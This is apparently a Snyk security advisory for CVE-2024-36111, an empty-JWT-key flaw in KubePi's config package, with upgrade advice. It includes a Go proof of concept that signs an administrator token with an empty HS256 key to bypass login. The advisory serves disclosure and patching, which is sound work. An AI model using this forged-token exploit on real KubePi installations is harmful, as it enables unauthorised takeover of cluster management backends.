Improper Validation of Integrity Check Value Affecting github.com/kubeoperator/kubepi/internal/config package, versions >=1.6.3 <1.8.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (11th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMKUBEOPERATORKUBEPIINTERNALCONFIG-7572606
- published 29 Jul 2024
- disclosed 25 Jul 2024
- credit ibranch7
Introduced: 25 Jul 2024
CVE-2024-36111 Open this link in a new tabHow to fix?
Upgrade github.com/KubeOperator/kubepi/internal/config to version 1.8.0 or higher.
Overview
Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value due to the JWT key handling during the configuration file reading process. An attacker can bypass login verification and directly take over the backend by exploiting the empty key used in JWT token generation.
PoC
package main
import (
"fmt"
"github.com/kataras/iris/v12/middleware/jwt"
"time"
)
var jwtMaxAge = 100000 * time.Minute
type UserProfile struct {
Name string `json:"name"`
NickName string `json:"nickName"`
Email string `json:"email"`
Language string `json:"language"`
ResourcePermissions map[string][]string `json:"resourcePermissions"`
IsAdministrator bool `json:"isAdministrator"`
Mfa Mfa `json:"mfa"`
}
type Mfa struct {
Enable bool `json:"enable"`
Secret string `json:"secret"`
Approved bool `json:"approved"`
}
func main() {
jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
test := map[string][]string{}
profile := UserProfile{
Name: "admin",
NickName: "Administrator",
Email: "support@fit2cloud.com",
Language: "zh-CN",
ResourcePermissions: test,
IsAdministrator: true,
Mfa: Mfa{
Secret: "",
Enable: false,
Approved: false,
},
}
nonejwt, _ := jwtSigner.Sign(profile)
fmt.Println(string(nonejwt))
}